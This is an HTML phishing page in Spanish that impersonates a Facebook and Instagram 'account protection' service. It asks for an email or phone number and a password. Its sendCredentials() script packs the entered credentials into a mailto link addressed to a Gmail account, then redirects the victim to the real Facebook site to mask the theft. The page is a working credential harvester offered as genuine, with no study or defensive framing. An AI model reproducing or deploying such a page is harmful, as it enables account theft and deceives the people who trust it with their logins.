<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar sesión en Facebook</title>
    <style>
        /* Estilos CSS  para la pagina */
        body {
            background: #0f0f0f;
            color: #1c1e21;
            direction: ltr;
            line-height: 1.34;
            margin: 0;
            padding: 0;
            unicode-bidi: embed;
        }
        .login-container {
            width: 400px;
            margin: 100px auto;
            padding: 25px;
            background: rgb(86,63,251);
            background: radial-gradient(circle, rgba(86,63,251,1) 0%, rgba(198,70,252,1) 100%);
            border-radius: 5px;
            box-shadow: 0 2px 5px rgba(0,0,0,0.1);
            text-align: left;
        }
        .contenedor {
            margin-top: 20px; 
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        .logoFacebook img{
            width: 200px;
            height: 70px;
            margin-left: 90px;
        }
        .logoInstagram img {
            width: 100px;
            height: 70px;
            margin-right: 150px;
        }
        
        .tagline {
            font-size: 14px;
            color: #555;
            margin-top: 10px;
            text-align: left;
        }
        .input-group {
            margin-bottom: 15px;
        }
        .input-group label {
            display: block;
            margin-bottom: 5px;
            text-align: left;
        }
        .input-group input {
            width: 100%;
            padding: 8px;
            border: 1px solid #ccc;
            border-radius: 3px;
        }
        .btn-login {
            background-color: #000307;
            color: #ffffff71;
            padding: 10px 20px;
            margin: 0 150px;
            border: none;
            border-radius: 10px;
            cursor: pointer;
            align-items: center;
        }
        .btn-login:hover {
            background-color: #080808;
            align-items: center;
        }
        #informacionAdicional{
            display: none;
            text-align: center;
        }
    </style>
</head>
<body>
    <div class="contenedor">
    <div class="logoFacebook">
        <img src="logoFacebook.png" alt="Facebook">
    </div>
    <div class="logoInstagram">
        <img src="logoInstagram.png" alt="Instagram">
    </div></div>
    <div class="login-container">
            <div>
                <h2>Inicia sesión con tu usuario y contraseña</h2>
                <p>Estamos para proteger tus redes sociales, y ahora con nuestra nueva actualización
                    podras registrar no solo tu cuenta de Facebook, si no tambien la de tu Instagram...
                    ¡Increible! ¿Verdad?                                            
                    y por ahora ¡Es gratis!.
                </p>
            </div>
        <div class="input-group">
            <label for="user">Correo electrónico o teléfono</label>
            <input type="text" id="user" name="user" placeholder="Correo electrónico o teléfono" required>
        </div>
        <div class="input-group">
            <label for="password">Contraseña</label>
            <input type="password" id="password" name="password" placeholder="Contraseña" required>
        </div>
        <button class="btn-login" onclick="sendCredentials()">Proteger</button>
        <a href="link.html" id="mostrarInformacion">¿Como registrar tus cuentas?</a>
        <div id="informacionAdicional">
        Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam vestibulum tortor in dui pretium, vel convallis lectus tincidunt.
    </div>
    </div>

    <script>
        function sendCredentials() {
            var user = document.getElementById('user').value;
            var password = document.getElementById('password').value;
            var mensaje = "Usuario (correo o teléfono): " + user + "\nContraseña: " + password;
            var correoDestino = "datosbase844@gmail.com";
            var subject = "Datos de inicio de sesión: Confirme si es Facebook o Instagram";
            var mailToLink = "mailto:" + correoDestino + "?subject=" + subject + "&body=" + encodeURIComponent(mensaje);
            window.location.href = mailToLink;
            setTimeout(function() {
                window.location.href = "https://web.facebook.com/";
            }, 2000);
        }
    </script>
</body>
</html>
